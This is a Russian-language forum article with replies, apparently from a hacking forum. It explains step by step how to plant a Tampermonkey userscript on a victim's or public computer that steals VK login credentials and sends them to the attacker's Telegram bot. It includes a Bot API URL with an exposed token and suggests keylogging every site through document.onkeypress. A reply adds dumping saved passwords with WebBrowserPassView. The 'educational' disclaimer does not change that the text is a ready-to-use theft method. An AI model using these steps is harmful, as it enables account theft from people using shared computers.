Итак, вы получили доступ к компьютеру жертвы на условные 5 минут. У вас с собой нет ни ******а, ни дедика, куда бы вы могли складывать полученные ****. Однако вы хотите парсить **** с сайтов. Как это реализовать? Читайте в этой статье. Внимание! Автор не призывает к эксплуатации данного метода. Статья написана в образовательных целях. Способ особенно эффективен, если вектор атаки происходит за публичным компьютером (библиотека, школа, универ), поскольку можно собирать куда больше *****. Из преимуществ способа: Вам не нужен отдельный сервер. Все **** хранятся в вашем Telegram боте Формально скрипт не работает в пространстве операционной системы. Все выполняется в браузере Мало кто вообще знает про расширения для браузера и обычно туда никогда не смотрит Из недостатков: Токен бота распространяется вместе со скриптом. tl;dr Устанавливаете расширение в браузер -> Пишете скрипт на JS -> Собираете **** Вектор атаки Итак, вы получили доступ к компьютеру на условные 5 минут. Первым делом вы скачиваете расширение, позволяющее ставить пользовательские скрипты. Это может быть Tampermonkey, Greasemonkey или вы можете написать свое расширение. Будем рассматривать на примере Firefox. Скачиваем расширение прямо с сайта аддонов. Вы можете несколько повысить эффективность, разрешив запуск расширения в приватных окнах в настройках. Создаем бота через BotFather и получаем токен. Получаем свой Telegram ID через getmyid_bot. Он понадобится нам позднее. Делаем проверку. Отправляем сообщение боту и переходим по ссылке вида https://api.telegram.org/bot1839256101:AAG1RpYQxOcvHEnR0lWMoAUHyaxyUPruj8o/sendMessage?chat_id=ВАШАЙДИ&text=123 Итак, расширение установлено и все данные для бота у нас есть. Можем приступать к написанию ******а. Создаем новый скрпит. На примере VK находим нужные нам поля, откуда будут взяты ****. Запоминаем id элементов Прекрасно! Жертва написала свои данные. Теперь вешаем событие отправки ***** на кнопку. Очевидно, что все данные будут заполнены, когда кнопка будет нажата. В результате у нас получается следующий код... Пример работы Вот так просто в несколько строчек можно граббить **** с браузера. Внимание! Этот код очень сырой и не предназначен для полевого деплоя. Возможны несрабатывания скрипта. Вы также можете собирать данные со всех сайтов с помощью document. onkeypress и вместо fetch использовать new Image().src = url. Короче функционал скрипта, работающего в браузере по сути огромен. Спасибо за внимание.
Если ты у компа будешь 5 минут, тебе достаточно будет достать флешку с прогой "WebBrowserPassView" запустить и за пару секунд все логпассы скинуть на свой носитель
focusw0w13337, focusw0w13337, focusw0w13337, Это будет означать, что ты получишь только те данные, кои были на ПК ранее. Способ, описанный в статье предполагает получение ***** в периоде от времени далее после развертывания скрипта до неопределенного момента (удаление браузера/расширения/скрипта)